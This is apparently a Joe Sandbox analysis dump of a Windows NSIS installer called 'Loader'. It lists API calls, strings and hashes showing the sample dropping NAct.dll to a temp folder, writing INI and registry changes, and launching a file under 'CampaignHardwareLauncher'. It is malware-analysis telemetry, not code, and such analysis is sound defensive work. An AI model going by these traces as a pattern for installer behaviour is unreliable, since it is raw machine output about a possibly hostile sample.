                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                                • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                                • Opcode ID: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: @bG$RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\")
                                                                                                                                                                                                                                                                                                                • API String ID: 3734993849-1676250096
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00402B5A
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(05C05526,00000064,05C0552A), ref: 00403295
                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,?), ref: 00402202
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 004021D6
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658, xrefs: 004021EE
                                                                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                                • API String ID: 3156913733-2464696229
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4d879d2c8321bb463321977456507b10eaea5390416c5072baed3c839463aa30
                                                                                                                                                                                                                                                                                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d879d2c8321bb463321977456507b10eaea5390416c5072baed3c839463aa30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                                • String ID: <RM>$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$WriteINIStr: wrote [%s] %s=%s in %s$install
                                                                                                                                                                                                                                                                                                                • API String ID: 247603264-1427044805
                                                                                                                                                                                                                                                                                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 30a9f30ffce614aff23d91e5a274339f7b18f56dfa2a9d4bf8bd5c228ca3d296
                                                                                                                                                                                                                                                                                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30a9f30ffce614aff23d91e5a274339f7b18f56dfa2a9d4bf8bd5c228ca3d296
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5eded073d719063d7dd2b7ed0f4ab774b9adb8237686967b3f1148e91f7db3db
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eded073d719063d7dd2b7ed0f4ab774b9adb8237686967b3f1148e91f7db3db
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
